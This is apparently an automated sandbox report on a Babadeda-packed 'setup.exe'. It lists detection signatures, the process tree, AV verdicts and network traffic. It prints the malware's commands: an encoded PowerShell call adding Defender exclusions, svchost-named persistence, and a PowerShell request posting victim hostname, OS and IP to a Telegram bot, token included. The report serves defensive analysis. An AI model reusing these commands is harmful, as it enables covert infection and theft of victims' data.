
Windows Analysis Report
setup.exe

Overview

General Information

Sample name: setup.exe
Analysis ID: 1579562
MD5: 9ee966ddff608734b5b15cd5f1d810d8
SHA1: 0b3477a4e740c78a0fbb479353cd068c998ead6f
SHA256: 5f82e21c783da05e616618ac9aca0dc5b240bcb3dbf15c4d2d07d19fe57bc056
Tags: exe, user-aachum

Detection

Babadeda
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Check external IP via Powershell
Yara detected Babadeda
AI detected suspicious sample
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to hide a thread from the debugger
Drops PE files to the startup folder
Drops PE files with benign system names
Encrypted powershell cmdline option found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking mutex)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Uses the Telegram API (likely for C&C communication)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • setup.exe (PID: 2008 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 9EE966DDFF608734B5B15CD5F1D810D8)
    • powershell.exe (PID: 1396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7464 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • svchost.exe (PID: 5968 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: 487267C7B1B9BB3029AD15AAF79827A2)
      • svchost.exe (PID: 7256 cmdline: "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe" MD5: A3027B4F632E949EF06C151BD8787FAF)
        • svchost.exe (PID: 7304 cmdline: "C:\ProgramData\svchost\svchost.exe" --run MD5: A3027B4F632E949EF06C151BD8787FAF)
    • tg.exe (PID: 5544 cmdline: "C:\Users\user\AppData\Local\Temp\tg.exe" MD5: F8ECEDC88E4D2776486231D0EF0AEA5D)
      • cmd.exe (PID: 7176 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7272 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 7296 cmdline: powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7508 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 7524 cmdline: powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 7800 cmdline: powershell -Command "$env:COMPUTERNAME" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7916 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 7932 cmdline: powershell -Command "[System.Environment]::OSVersion" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 8008 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 8024 cmdline: powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 8104 cmdline: powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:05:51, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • client.exe (PID: 7352 cmdline: "C:\Users\user\AppData\Local\Temp\client.exe" MD5: 0302EF4E965477DD225B298374C62722)
  • svchost.exe (PID: 7732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7888 cmdline: "C:\ProgramData\svchost\svchost.exe" --run MD5: A3027B4F632E949EF06C151BD8787FAF)
  • cleanup
Name: Babadeda
Description: According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers' analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

No configs have been found

Source: C:\Users\user\AppData\Local\Temp\tg.exe; Rule: JoeSecurity_Babadeda; Description: Yara detected Babadeda; Author: Joe Security
Source: 4.2.tg.exe.400000.0.unpack; Rule: JoeSecurity_Babadeda; Description: Yara detected Babadeda; Author: Joe Security
Source: 4.0.tg.exe.400000.0.unpack; Rule: JoeSecurity_Babadeda; Description: Yara detected Babadeda; Author: Joe Security

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\setup.exe, ProcessId: 2008, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 2008, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", ProcessId: 1396, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 2008, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 5968, ProcessName: svchost.exe
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\svchost.exe, ProcessId: 5968, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 2008, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", ProcessId: 1396, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 2008, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 5968, ProcessName: svchost.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7176, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", ProcessId: 7508, ProcessName: cmd.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\ProgramData\svchost\svchost.exe" --run, EventID: 13, EventType: SetValue, Image: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe, ProcessId: 7256, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 2008, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", ProcessId: 1396, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 2008, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 5968, ProcessName: svchost.exe

Language, Device and Operating System Detection

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7176, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", ProcessId: 7508, ProcessName: cmd.exe

No Suricata rule has matched


AV Detection

Source: setup.exe; Avira: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe; Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\ProgramData\svchost\svchost.exe; Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe; ReversingLabs: Detection: 63%
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe; Virustotal: Detection: 69%
Source: C:\ProgramData\svchost\svchost.exe; ReversingLabs: Detection: 63%
Source: C:\ProgramData\svchost\svchost.exe; Virustotal: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\tg.exe; ReversingLabs: Detection: 23%
Source: setup.exe; Virustotal: Detection: 61%
Source: setup.exe; ReversingLabs: Detection: 63%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tg.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Joe Sandbox ML: detected
Source: C:\ProgramData\svchost\svchost.exe; Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\AppData\Local\Temp\tg.exe; Unpacked PE file: 4.2.tg.exe.400000.0.unpack
Source: setup.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: Binary string: D:\Projects\WinRAR\SFX\build\sfxrar64\Release\sfxrar.pdb; source: setup.exe, 00000000.00000002.1782894473.0000000004B87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1692339333.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Code function: 3_2_00007FF669ACA9C0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCurrentProcessId,GetCommandLineW,ShellExecuteExW,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn (3_2_00007FF669ACA9C0)
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Code function: 3_2_00007FF669AB341C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn (3_2_00007FF669AB341C)
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Code function: 3_2_00007FF669ADEBE0 FindFirstFileExA (3_2_00007FF669ADEBE0)
Source: C:\Users\user\AppData\Local\Temp\tg.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\AppData\Local\Temp\tg.exe; File opened: C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp
Source: C:\Users\user\AppData\Local\Temp\tg.exe; File opened: C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.tmp
Source: C:\Users\user\AppData\Local\Temp\tg.exe; File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Temp\tg.exe; File opened: C:\Users\user\AppData\Local\Temp\1BBA.tmp
Source: C:\Users\user\AppData\Local\Temp\tg.exe; File opened: C:\Users\user\

Networking

Source: unknown; DNS query: name: api.telegram.org
Source: Joe Sandbox View; IP Address: 149.154.167.220
Source: Joe Sandbox View; IP Address: 104.26.13.205
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: api.ipify.org
Source: global traffic; HTTP traffic detected: GET /?format=text HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/x-www-form-urlencoded | Host: api.telegram.org | Content-Length: 260 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: api.ipify.org
Source: global traffic; DNS traffic detected: DNS query: api.telegram.org
Source: unknown; HTTP traffic detected: POST /bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/x-www-form-urlencoded | Host: api.telegram.org | Content-Length: 260 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown; Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown; Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49734
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe; Code function: 7_2_00405390 GetTickCount,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalSize,CloseClipboard,GlobalLock,GlobalUnlock,_memset,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GetTickCount,GlobalFree,CloseClipboard (7_2_00405390)
Source: C:\ProgramData\svchost\svchost.exe; Code function: 10_2_00405390 GetTickCount,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalSize,CloseClipboard,GlobalLock,GlobalUnlock,_memset,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GetTickCount,GlobalFree,CloseClipboard (10_2_00405390)
Source: C:\ProgramData\svchost\svchost.exe; Code function: 18_2_00405390 GetTickCount,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalSize,CloseClipboard,GlobalLock,GlobalUnlock,_memset,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GetTickCount,GlobalFree,CloseClipboard (18_2_00405390)
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe; Code function: 7_2_00401090 GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread (7_2_00401090)
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe; Code function: 7_2_00401100 GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess (7_2_00401100)
Source: C:\ProgramData\svchost\svchost.exe; Code function: 10_2_00401090 GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread (10_2_00401090)
Source: C:\ProgramData\svchost\svchost.exe; Code function: 10_2_00401100 GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess (10_2_00401100)
